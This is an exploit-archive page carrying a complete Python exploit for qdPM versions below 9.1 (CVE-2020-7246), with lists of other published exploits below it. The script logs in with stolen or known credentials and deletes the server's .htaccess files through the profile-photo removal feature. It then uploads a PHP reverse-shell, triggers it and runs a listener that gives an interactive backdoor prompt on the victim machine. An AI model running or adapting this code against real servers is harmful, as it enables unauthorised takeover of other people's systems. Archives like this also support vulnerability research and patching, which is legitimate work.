Menu

Search for hundreds of thousands of exploits

"qdPM < 9.1 - Remote Code Execution"

Author

Exploit author

"Tobin Shields"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-02-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
#!/usr/bin/python

#-------------------------------------------------------------------------------------
# Title:	qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)
# Author:	Tobin Shields (@TobinShields)
#
# Description:	This is an exploit to automatically upload a PHP web shell to
#				the qdPM platform via the "upload a profile photo" feature.
#				This method also bypasses the fix put into place from a previous CVE
#
# Usage:		In order to leverage this exploit, you must know the credentials of
#				at least one user. Then, you should modify the values highlighted below.
#				You will also need a .php web shell payload to upload. This exploit
#				was built and tested using the PHP script built by pentestmonkey:
#				https://github.com/pentestmonkey/php-reverse-shell
#-------------------------------------------------------------------------------------

# Imports
from requests import Session
from bs4 import BeautifulSoup as bs
import socket
from multiprocessing import Process
import time

# CHANGE THESE VALUES-----------------------------------------------------------------
login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"
username = "jsmith@example.com"
password = "Pa$$w0rd"
payload = "/path/to/payload.php"
listner_port = 1234 			# This should match your PHP payload
connection_delay = 2 			# Increase this value if you have a slow connection and are experiencing issues
# ------------------------------------------------------------------------------------

# Build the myAccout URL from the provided URL
myAccount_url = login_url.replace("login", "myAccount")

# PROGRAM FUNCTIONS -----------------------------------------------------------------
# Utility function for anytime a page needs to be requested and parsed via bs4
def requestAndSoupify(url):
	page = s.get(url)
	soup = bs(page.content, "html.parser")
	return soup

# Function to log into the application, and supply the correct username/password
def login(url):
	# Soupify the login page
	login_page = requestAndSoupify(url)
	# Grab the csrf token
	token = login_page.find("input", {"name": "login[_csrf_token]"})["value"]
	# Build the POST values
	login_data = {
		"login[email]": username,
		"login[password]": password,
		"login[_csrf_token]": token
	}
	# Send the login request
	s.post(login_url, login_data)

# Function to get the base values for making a POST request from the myAccount page
def getPOSTValues():
	myAccount_soup = requestAndSoupify(myAccount_url)
	# Search for the 'base' POST data needed for any requests
	u_id 	= myAccount_soup.find("input", {"name": "users[id]"})["value"]
	token 	= myAccount_soup.find("input", {"name": "users[_csrf_token]"})["value"]
	u_name 	= myAccount_soup.find("input", {"name": "users[name]"})["value"]
	u_email = myAccount_soup.find("input", {"name": "users[email]"})["value"]
	# Populate the POST data object
	post_data = {
		"users[id]": u_id,
		"users[_csrf_token]": token,
		"users[name]": u_name,
		"users[email]": u_email,
		"users[culture]": "en" # Keep the language English--change this for your victim locale
	}
	return post_data

# Function to remove the a file from the server by exploiting the CVE
def removeFile(file_to_remove):
	# Get base POST data
	post_data = getPOSTValues()
	# Add the POST data to remove a file
	post_data["users[photo_preview]"] = file_to_remove
	post_data["users[remove_photo]"] = 1
	# Send the POST request to the /update page
	s.post(myAccount_url + "/update", post_data)
	# Print update to user
	print("Removing " + file_to_remove)
	# Sleep to account for slow connections
	time.sleep(connection_delay)

# Function to upload the payload to the server
def uploadPayload(payload):
	# Get payload name from supplied URI
	payload_name = payload.rsplit('/', 1)[1]
	# Request page and get base POST files
	post_data = getPOSTValues()
	# Build correct payload POST header by dumping the contents
	payload_file = {"users[photo]": open(payload, 'rb')}
	# Send POST request with base data + file
	s.post(myAccount_url + "/update", post_data, files=payload_file)
	# Print update to user
	print("Uploading " + payload_name)
	# Sleep for slow connections
	time.sleep(connection_delay)

# A Function to find the name of the newly uploaded payload
	# NOTE: We have to do this because qdPM adds a random number to the uploaded file
	# EX: webshell.php becomes 1584009-webshell.php
def getPayloadURL():
	myAccount_soup = requestAndSoupify(myAccount_url)
	payloadURL = myAccount_soup.find("img", {"class": "user-photo"})["src"]
	return payloadURL

# Function to handle creating the webshell listener and issue commands to the victim
def createBackdoorListener():
	# Set up the listening socket on localhost
	server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	host = "0.0.0.0"
	port = listner_port # Specified at the start of this script by user
	server_socket.bind((host, port))
	server_socket.listen(2)
	victim, address = server_socket.accept()
	# Print update to user once the connection is made
	print("Received connection from: " + str(address))

	# Simulate a terminal and build a pusdo-prompt using the victem IP
	prompt = "backdoor@" + str(address[0]) + ":~$ "

	# Grab the first response from the victim--this is usually OS info
	response = victim.recv(1024).decode('utf-8')
	print(response)
	print("\nType 'exit' at any time to close the connection")

	# Maintain the connection and send data back and forth
	while True:
		# Grab the command from the user
		command = input(prompt)
		# If they type "exit" then close the socket
		if 'exit' in command:
			victim.close()
			server_socket.close()
			print("Disconnecting, please wait...")
			break
		# For all other commands provided
		else:
			# Encode the command to be properly sent via the socket & send the command
			command = str.encode(command + "\n")
			victim.send(command)
			# Grab the response to the command and decode it
			response = victim.recv(1024).decode('utf-8')
			# For some odd reason you have to hit "enter" after sending the command to receive the output
			# TODO: Fix this so it works on a single send? Although it might just be the PHP webshell
			victim.send(str.encode("\n"))
			response = victim.recv(1024).decode('utf-8')
			# If a command returns nothing (i.e. a 'cd' command, it prints a "$"
			# This is a confusing output so it will omit this output
			if response.strip() != "$":
				print(response)

# Trigger the PHP to run by making a page request
def triggerShell(s, payloadURL):
	pageReq = s.get(payloadURL)

# MAIN FUNCTION ----------------------------------------------------------------------
# The main function of this program establishes a unique session to issue the various POST requests
with Session() as s:
	# Login as know user
	login(login_url)
	# Remove Files
		# You may need to modify this list if you suspect that there are more .htaccess files
		# However, the default qdPM installation just had these two
	files_to_remove = [".htaccess", "../.htaccess"]
	for f in files_to_remove:
		removeFile(f)
	# Upload payload
	uploadPayload(payload)
	# Get the payload URL
	payloadURL = getPayloadURL()
	# Start a thread to trigger the script with a web request
	process = Process(target=triggerShell, args=(s, payloadURL))
	process.start()
	# Create the backdoor listener and wait for the above request to trigger
	createBackdoorListener()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-02-28 "qdPM < 9.1 - Remote Code Execution" webapps multiple "Tobin Shields"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.